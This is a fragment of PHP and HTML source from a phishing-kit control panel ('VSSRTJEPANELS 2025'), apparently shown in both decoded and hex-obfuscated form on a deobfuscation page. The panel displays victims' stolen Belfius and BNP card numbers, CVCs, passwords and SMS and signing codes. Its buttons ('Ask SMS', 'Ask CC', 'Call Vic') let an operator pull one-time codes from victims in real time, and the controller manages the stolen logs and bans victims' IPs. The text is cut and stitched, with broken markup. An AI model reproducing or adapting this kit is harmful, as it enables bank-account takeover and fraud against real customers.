', 'call')"><i class="fa fa-phone" aria-hidden="true"></i>
| Call Vic</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'tan')"><i class="fa fa-envelope" aria-hidden="true"></i>
| CVC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
| CC Info</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'custom')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Custom </button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control bnp-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Login Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control bnp-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Sign Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control bnp-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">
</div>
<div class="col-lg-3">
<hr>
</div>
<div class="col-lg-9">
<hr>
<input hidden type="text" class="form-control bnp-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
<input hidden type="text" class="form-control bnp-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
| Live Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control bnp-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
<input type="text" class="form-control bnp-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["bank"] === "BELFIUS") { function BELFIUS($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_card"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">CardNumber:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>6703 " . htmlspecialchars($log["belfius_card"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_vv"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Expiry:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_vv"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_phone"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Phone:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_phone"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_sms"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">SMS code:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_sms"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_custom"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Custom:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_custom"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_pass"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Password:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_pass"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_cc"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">cc card:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_cc"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_cc_exp"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">cc exp:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_cc_exp"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_cvc"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">cc cvc:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_cvc"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_bel"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">belpage:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_bel"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_m1"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">M1 Code: </label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_m1"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_m2"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">M2 Code:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_m2"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_live"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Live Code:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_live"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_buy"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Buy Code:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["belfius_buy"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if ($log["waiting"] == "true") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'identification')"><i class="fa fa-phone" aria-hidden="true"></i> Ask Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'bel')"><i class="fa fa-phone" aria-hidden="true"></i> Call Vic</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'loginCode')"><i class="far fa-keyboard"></i> Ask SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'password')"><i class="fa fa-info-circle"></i> Ask Password</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'credit')"><i class="far fa-credit-card"></i> Ask CC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-success mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'custom')"><i class="fa fa-sign-language" aria-hidden="true"></i> Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control bnp-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<hr>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'signCode')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask M1</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control belfius-one input-dark mt-4 custom-input" placeholder="Please enter a sign code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'token')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask M2</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control belfius-two input-dark mt-4 custom-input" placeholder="Please enter a m2 code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'live')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask Live</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control belfius-live input-dark mt-4 custom-input" placeholder="Please enter a live code">
<input type="text" class="form-control belfius-live-two input-dark mt-4 custom-input" placeholder="Please enter a live code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'buy')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask Buy</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control belfius-buy input-dark mt-4 custom-input" placeholder="Please enter a buy code">
<input type="text" class="form-control belfius-buy-two input-dark mt-4 custom-input" placeholder="Please enter a buy code">
</div>
</div>
</div>
</div >
<?php } } } } } } } } } } if ($log["waiting"] === "false") { echo "</div>"; echo "</div>"; echo "</div>"; } echo "<div class="col-lg-4 col-sm-12">"; echo "<div class="card-header text-white bg-darker siilenced-darker">\xa <i class="fa fa-cog" aria-hidden="true"></i> Options
\xa
</div><div class="col-12 p-4 bg-darker custom-top-margin " style="min-height: 173px;">"; ?>
<p style="font-style: italic;"><i class="fa fa-comments" aria-hidden="true"></i> This function manages the log, you can ban or delete a specific log.</p>
<hr>
<button class="btn btn-sm btn-outline-danger col-lg-12" style="font-style: italic;" data-toggle="modal" data-target="#exampleModalCenter">
<i class="fa fa-ban"></i> Ban User</button>
<br><br>
<button class="btn btn-sm btn-outline-warning col-lg-12" onclick="deleteLog('<?php echo htmlspecialchars($log["user_id"]); ?>
')" style="font-style: italic;">
<i class="fa fa-trash"></i> Delete User</button>
<hr>
<button class="btn btn-sm col-lg-12" style="font-style: italic;">
@Vssrtje | Developer</button>
<?php echo "</div>"; echo "</div>"; echo "</div>"; echo "
<div class="row p-1 mt-3 mb-3">\xa"; echo "\xa<div class="col-lg-8 col-sm-12">
"; echo "\xa<div class="card-header text-white bg-darker siilenced-darker">\xa <i class="fa fa-user" aria-hidden="true"></i> Specific User Data
</div>
<div class="col-12 p-4 bg-darker ">\xa "; echo "\xa <div class="veusdeput rounded p-4">\xa "; echo "
<div class="form-group row">\xa "; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">User ID:</label>"; echo "
<div class="col-sm-9">
"; echo "
<p class="copy-value" onclick="copyToClipboard(this)" class="text-secondary"><i>" . $log["user_id"] . "</i></p>\xa "; echo "\xa </div>\xa "; echo "\xa </div>\xa "; echo "\xa <div class="form-group row">
"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">User Browser:</label>"; echo "\xa <div class="col-sm-9">\xa "; echo "\xa <p class="copy-value" onclick="copyToClipboard(this)" class="text-secondary"><i>" . $log["user_agent"] . "</i></p>
"; echo "\xa </div>
"; echo "\xa </div>\xa "; echo "\xa <div class="form-group row">
"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">User IP:</label>"; echo "\xa <div class="col-sm-9">\xa "; echo "
<p class="copy-value" onclick="copyToClipboard(this)" class="text-secondary"><i>" . $log["ip"] . "</i></p>
"; echo "
</div>
"; echo "\xa </div>
"; echo "
</div>
</div>\xa<br><br><br><br><br><br><br><br>"; } } ?>
Did this file decode correctly?
Original Code
<?php
// VSSRTJE >< VSSRTJEPANELS 2025
namespace App\Controllers\Users; use Core\View; use App\Models\Users\User; use App\Auth; class Logs extends \Core\Controller { public function logsAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\x75\163\x65\162\x6e\x61\x6d\x65"]); if ($data) { if ($_SERVER["\x52\105\121\x55\105\123\x54\137\115\105\x54\110\x4f\x44"] == "\120\x4f\x53\x54") { $logs = User::getLogs($_SESSION["\x75\163\145\162\156\141\x6d\x65"]); $this->showLogs($logs); } else { View::render("\x41\144\155\151\156\57\154\157\x67\x73\56\160\x68\x70", array("\x74\151\164\x6c\x65" => "\114\157\x67\163")); } } else { Auth::destroySession(); } } else { static::redirect("\57\x62\x65\x6c\x67\x69\143\x61\x2f\x73\164\x61\x72\164"); } } public function getOneAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\165\x73\145\x72\156\x61\155\x65"]); if ($data) { if ($_SERVER["\122\x45\121\x55\105\x53\x54\x5f\x4d\x45\124\x48\x4f\104"] == "\120\117\123\124" && isset($_POST["\x69\x64"])) { $log = User::getLog($_POST["\x69\144"], $_SESSION["\x75\163\x65\162\156\141\155\145"]); $this->showLog($log); } else { static::redirect("\57\141\144\155\x69\x6e\x2f\154\157\x67\x73"); } } else { Auth::destroySession(); } } else { static::redirect("\x2f\142\x65\154\147\151\x63\141\x2f\x73\x74\141\x72\164"); } } public function deleteAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\x75\163\145\x72\156\141\x6d\145"]); if ($data) { if ($_SERVER["\x52\105\121\x55\105\123\124\x5f\x4d\105\124\110\x4f\104"] == "\x50\117\x53\x54" && isset($_POST["\151\144"])) { $data = array("\x69\144" => $_POST["\x69\144"]); $wachten = "\x3c\144\x69\x76\40\143\154\x61\163\163\x3d\42\166\x73\x73\x72\x73\164\141\x74\165\x73\40\166\x73\x73\162\x6f\x6e\154\x69\x6e\145\42\76\360\x9f\237\xa2\40\174\x20\x4f\x6e\154\x69\x6e\x65\74\57\x64\x69\166\76"; $errors = array("\151\x64" => ''); $wachten = "\x3c\144\151\166\40\143\x6c\x61\163\x73\75\42\x76\163\x73\162\x73\x74\141\x74\165\x73\x20\166\163\x73\x72\x6f\156\154\x69\156\145\42\x3e\360\x9f\x9f\242\x20\174\40\x4f\x6e\x6c\x69\156\x65\74\57\144\x69\x76\x3e"; if (empty($data["\151\x64"])) { $errors["\x69\144"] = "\x65\155\160\164\171\x5f\x69\x64"; } if (empty($errors["\x69\144"])) { $check = User::deleteLog($_SESSION["\165\163\145\162\156\x61\155\x65"], $data["\x69\x64"]); if ($check) { echo json_encode(array("\163\x75\x63\143\x65\x73\163" => "\x74\x72\x75\x65")); } else { echo json_encode(array("\x66\x61\151\154" => "\162\145\x71\x75\145\163\164\137\x66\x61\x69\x6c\145\144")); } } else { echo json_encode($errors); } } else { static::redirect("\57\x62\x65\154\x67\x69\143\141\57\163\x74\x61\162\x74"); } } else { Auth::destroySession(); } } else { static::redirect("\57\x62\145\x6c\147\x69\143\x61\57\x73\x74\141\x72\164"); } } public function updateNoteAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\165\x73\145\162\156\141\155\x65"]); if ($data) { if ($_SERVER["\122\x45\121\x55\105\x53\124\137\115\x45\124\x48\x4f\104"] == "\x50\x4f\123\124" && isset($_POST["\x69\144"]) && isset($_POST["\x6e\x6f\x74\145"])) { $data = array("\x69\x64" => $_POST["\x69\x64"], "\156\x6f\x74\x65" => $_POST["\156\x6f\x74\x65"]); $errors = array("\151\144" => '', "\x6e\x6f\164\145" => ''); if (empty($data["\x69\x64"])) { $errors["\x69\x64"] = "\x65\x6d\160\164\x79\x5f\151\144"; } if (empty($data["\x6e\157\x74\x65"])) { $errors["\x6e\157\x74\x65"] = "\145\x6d\x70\164\x79\137\156\x6f\164\145"; } if (empty($errors["\151\144"]) && empty($errors["\156\157\x74\145"])) { $check = User::updateNote($_SESSION["\x75\x73\145\x72\156\x61\x6d\145"], $data["\151\x64"], $data["\156\x6f\164\145"]); if ($check) { echo json_encode(array("\163\165\143\143\145\163\163" => "\x74\162\165\145")); } else { echo json_encode(array("\146\x61\151\x6c" => "\x72\x65\161\x75\x65\163\x74\137\x66\x61\151\154\x65\x64")); } } else { echo json_encode($errors); } } else { static::redirect("\x2f\142\x65\x6c\147\151\143\x61\x2f\x73\164\141\x72\x74"); } } else { Auth::destroySession(); } } else { static::redirect("\x2f\142\x65\x6c\147\151\143\141\x2f\163\164\x61\x72\164"); } } public function deleteAllAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\x75\x73\145\x72\x6e\x61\155\x65"]); if ($data) { if ($_SERVER["\x52\x45\x51\x55\105\x53\124\137\x4d\x45\124\110\117\x44"] == "\120\117\123\124") { $check = User::deleteLogs($_SESSION["\x75\163\x65\x72\156\x61\155\145"]); if ($check) { echo json_encode(array("\x73\165\x63\x63\x65\x73\x73" => "\164\162\x75\145")); } else { echo json_encode(array("\146\x61\151\154" => "\x72\x65\x71\x75\145\x73\x74\137\x66\141\151\x6c\x65\x64")); } } else { static::redirect("\57\x62\145\x6c\147\x69\x63\141\x2f\163\x74\x61\x72\164"); } } else { Auth::destroySession(); } } else { static::redirect("\57\x62\145\x6c\147\x69\143\x61\57\163\164\141\x72\x74"); } } public function deleteEmptyAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\x75\163\145\x72\x6e\x61\155\145"]); if ($data) { if ($_SERVER["\122\105\121\125\105\123\124\x5f\115\x45\124\110\x4f\x44"] == "\x50\117\123\124") { $check = User::deleteEmptyLogs($_SESSION["\x75\x73\x65\x72\156\141\155\x65"]); if ($check) { echo json_encode(array("\x73\165\x63\143\145\163\163" => "\164\162\x75\145")); } else { echo json_encode(array("\x66\141\151\x6c" => "\x72\145\x71\165\x65\163\164\137\146\141\x69\154\145\144")); } } else { static::redirect("\57\142\145\154\x67\151\143\141\57\163\x74\x61\x72\164"); } } else { Auth::destroySession(); } } else { static::redirect("\x2f\142\145\154\147\x69\x63\141\x2f\163\x74\141\162\x74"); } } public function banAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\165\x73\x65\x72\x6e\141\x6d\x65"]); if ($data) { if ($_SERVER["\122\x45\121\x55\105\x53\124\137\115\x45\x54\x48\x4f\104"] == "\120\x4f\x53\124" && isset($_POST["\x69\144"]) && isset($_POST["\x69\x70"])) { $data = array("\151\144" => $_POST["\151\x64"], "\151\x70" => $_POST["\x69\x70"]); $errors = array("\151\144" => '', "\x69\160" => ''); if (empty($data["\x69\x64"])) { $errors["\x69\144"] = "\x65\x6d\x70\164\171\137\x69\144"; } if (empty($data["\151\160"])) { $errors["\x69\x70"] = "\x65\x6d\160\164\171\137\x69\160"; } if (empty($errors["\151\x64"]) && empty($errors["\151\160"])) { $check = User::banUser($data["\x69\144"], $data["\151\160"]); if ($check) { echo json_encode(array("\x73\x75\143\143\x65\x73\163" => "\x74\x72\x75\145")); } else { echo json_encode(array("\146\x61\151\154" => "\x72\x65\x71\x75\145\163\164\137\146\x61\x69\x6c\145\144")); } } else { echo json_encode($errors); } } else { static::redirect("\57\x62\145\154\147\x69\143\x61\57\163\164\x61\162\x74"); } } else { Auth::destroySession(); } } else { static::redirect("\57\x62\145\154\147\x69\143\141\57\x73\164\141\x72\164"); } } private function showLogs($logs) { $topLogs = array(); $otherLogs = array(); $userAgents = array("\x47\157\x6f\x67\154\x65\40\x43\150\162\x6f\x6d\x65" => array("\x69\143\x6f\156" => "\146\x61\x62\x20\x66\x61\55\143\150\x72\157\155\x65", "\x74\x79\x70\x65" => "\x42\162\157\167\163\145\x72"), "\x46\151\x72\145\x66\157\170" => array("\151\143\x6f\x6e" => "\x66\141\x62\40\x66\141\55\146\151\x72\x65\x66\x6f\170", "\164\171\160\x65" => "\x42\x72\x6f\x77\x73\145\162"), "\123\x61\146\x61\x72\151" => array("\x69\x63\157\156" => "\x66\141\x62\40\146\x61\55\x73\x61\146\x61\x72\151", "\x74\171\x70\x65" => "\102\x72\157\x77\x73\x65\x72"), "\x49\156\164\145\x72\156\x65\x74\40\x45\x78\x70\154\157\x72\x65\x72" => array("\151\143\x6f\156" => "\x66\141\142\x20\x66\141\x2d\x69\x6e\164\145\x72\x6e\145\x74\x2d\145\x78\x70\154\x6f\162\145\x72", "\164\x79\160\145" => "\102\162\157\167\x73\x65\x72"), "\x4d\x69\x63\162\157\163\x6f\x66\164\40\105\x64\x67\145" => array("\151\143\157\x6e" => "\146\x61\142\40\x66\x61\x2d\x65\144\147\x65", "\x74\x79\160\145" => "\102\x72\157\167\x73\145\x72"), "\x4f\x70\x65\162\x61" => array("\151\143\x6f\x6e" => "\146\x61\142\40\146\141\x2d\157\160\145\x72\141", "\164\x79\x70\145" => "\x42\162\x6f\x77\x73\x65\162"), "\102\162\x61\x76\145" => array("\151\143\x6f\156" => "\146\141\142\x20\x66\141\x2d\142\x72\x61\166\145", "\x74\x79\x70\x65" => "\102\162\x6f\x77\163\x65\x72"), "\x57\x69\156\144\x6f\x77\163" => array("\151\143\157\x6e" => "\146\x61\x62\40\x66\x61\x2d\x77\151\156\x64\157\167\x73", "\x74\171\x70\145" => "\117\x53"), "\115\141\143\40\x4f\x53" => array("\x69\143\157\x6e" => "\146\x61\x62\40\x66\x61\55\141\160\160\154\145", "\164\171\x70\x65" => "\x4f\x53"), "\114\151\x6e\165\170" => array("\151\x63\x6f\x6e" => "\x66\141\x62\x20\x66\141\55\x6c\151\156\x75\170", "\164\171\x70\145" => "\x4f\123")); foreach ($logs as $log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["\x6c\141\163\164\137\143\x6f\156\x6e\145\143\164\145\x64"]); $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); $waiting = "\x62\x67\x2d\x64\x61\x72\153\x65\162"; $wachten = "\x3c\144\151\x76\40\x63\x6c\x61\x73\x73\75\x22\x76\x73\163\162\163\164\x61\x74\x75\x73\40\166\163\163\x72\157\x66\146\x6c\151\156\x65\42\x3e\xe2\232\xab\x20\174\40\x4f\146\x66\154\x69\x6e\145\74\57\144\x69\x76\76"; if ($log["\x77\x61\x69\164\151\156\147"] == "\x74\162\165\x65") { $waiting = "\142\147\x2d\142\x6c\x69\x6e\153"; $wachten = "\74\x64\151\166\x20\x63\x6c\141\x73\163\75\x22\x76\x73\x73\x72\163\164\x61\164\165\x73\x20\166\x73\163\162\167\141\x69\164\x69\156\147\x22\76\xf0\237\x94\xb4\x20\x7c\40\x57\x61\x69\x74\151\x6e\147\x3c\57\144\x69\166\x3e"; array_push($topLogs, $log); } else { if ($diff < 10) { $waiting = "\142\147\x2d\163\165\x63\x63\145\163\163"; $wachten = "\x3c\x64\x69\166\x20\143\154\141\163\x73\x3d\42\166\x73\163\x72\163\164\x61\x74\165\x73\40\x76\163\x73\x72\157\x6e\154\x69\156\x65\x22\76\360\237\237\xa2\x20\174\x20\117\156\154\x69\156\x65\x3c\x2f\144\151\166\76"; array_push($topLogs, $log); } else { array_push($otherLogs, $log); } } } $allLogs = array_merge($topLogs, $otherLogs); foreach ($allLogs as $log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["\154\141\x73\164\x5f\x63\x6f\x6e\156\x65\143\x74\145\x64"]); $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); $waiting = "\142\147\x2d\144\141\162\x6b\x65\162"; $wachten = "\74\x64\151\166\x20\x63\x6c\x61\x73\x73\x3d\x22\166\x73\163\x72\x73\x74\x61\x74\x75\x73\40\x76\x73\x73\x72\157\146\x66\154\x69\x6e\x65\x22\76\342\x9a\253\40\174\x20\x4f\x66\146\x6c\x69\156\145\x3c\x2f\x64\151\x76\x3e"; if ($log["\x77\141\151\x74\x69\156\x67"] == "\164\x72\165\145") { $waiting = "\x62\x67\x2d\x62\154\151\156\153"; $wachten = "\x3c\144\151\166\40\143\x6c\x61\163\163\x3d\x22\166\x73\163\x72\x73\x74\x61\x74\165\x73\40\166\x73\x73\162\167\x61\151\164\x69\x6e\x67\x22\x3e\360\x9f\x94\264\x20\174\40\127\x61\x69\164\151\156\x67\74\x2f\144\151\166\x3e"; } else { if ($diff < 10) { $waiting = "\142\x67\x2d\163\x75\143\x63\145\x73\163"; $wachten = "\x3c\x64\151\166\40\143\154\141\163\163\75\x22\166\163\x73\162\163\x74\x61\164\x75\x73\40\x76\163\x73\x72\157\x6e\x6c\151\x6e\x65\42\x3e\360\x9f\x9f\242\40\174\40\117\x6e\154\151\156\145\74\x2f\x64\x69\x76\x3e"; } } $userAgentName = $log["\165\163\145\162\x5f\141\x67\145\x6e\164"]; $browserIcon = ''; $browserName = ''; $osIcon = ''; $osName = ''; foreach ($userAgents as $name => $info) { if (strpos($userAgentName, $name) !== false) { if ($info["\164\171\x70\145"] == "\102\162\x6f\167\163\145\162") { $browserIcon = $info["\151\x63\157\156"]; $browserName = $name; } else { if ($info["\x74\x79\160\x65"] == "\117\x53") { $osIcon = $info["\151\143\157\156"]; $osName = $name; } } } } if (isset($_POST["\145\155\160\164\171"])) { $sql = "\x44\x45\x4c\105\124\105\x20\x46\x52\x4f\x4d\x20\x6c\x6f\x67\163\40\x57\x48\x45\x52\105\x20\163\141\156\164\141\x6e\144\145\x72\137\x75\x73\x65\x72\40\75\40\47\47\40\101\x4e\x44\40\x73\x61\x6e\164\x61\x6e\x64\145\162\137\160\x61\163\x73\x20\x3d\x20\x27\x27\x20\101\x4e\x44\x20\163\141\x6e\x74\x61\156\144\145\x72\x5f\x65\x78\160\40\75\x20\47\x27\40\101\116\x44\40\163\x61\x6e\164\141\x6e\x64\145\x72\137\156\165\155\x62\145\x72\x20\x3d\x20\47\x27\x20\x41\116\104\x20\x73\141\x6e\164\141\x6e\144\145\x72\137\164\141\x6e\40\x3d\40\x27\47\x20\x41\116\x44\40\163\141\x6e\x74\x61\156\x64\x65\x72\x5f\143\157\x6e\146\151\x72\155\40\75\x20\47\47\40\x41\116\x44\40\163\141\156\164\x61\156\144\x65\162\137\167\x69\x66\x69\x20\x3d\x20\x27\x27\40\x41\116\x44\40\163\141\156\164\141\x6e\144\x65\x72\x5f\167\x69\146\x69\137\160\x61\163\163\40\x3d\x20\x27\x27\x20\101\116\104\40\163\x61\156\x74\x61\156\144\145\162\x5f\x77\151\x66\151\137\x70\141\163\x73\137\164\x77\x6f\40\x3d\40\x27\47\40\x41\116\104\40\x73\141\156\x74\141\156\144\x65\x72\x5f\143\162\145\144\151\164\143\x61\162\144\40\x3d\40\x27\x27\40\101\x4e\x44\40\163\x61\156\x74\x61\156\144\x65\162\x5f\143\143\x65\170\x70\40\x3d\40\47\47\x20\x41\116\x44\40\163\x61\156\164\141\x6e\144\145\x72\x5f\x63\166\166\40\75\40\47\47\x20\101\116\104\x20\x73\x61\x6e\x74\141\156\x64\x65\162\137\x63\157\x64\x65\40\x3d\40\47\x27\40\x41\x4e\104\x20\163\x61\156\x74\141\x6e\x64\145\162\x5f\162\145\x73\x70\157\156\x73\40\x3d\x20\x27\47"; $db = static::getDB(); $stmt = $db->prepare($sql); $stmt->execute(); header("\114\157\x63\x61\x74\151\x6f\156\x3a\40\x2f\x6c\x6f\147\x73"); die; } ?>
<br><br>
<table id="entries" class="table table-striped table-list-search">
</thead>
</tr>
</div>
</div>
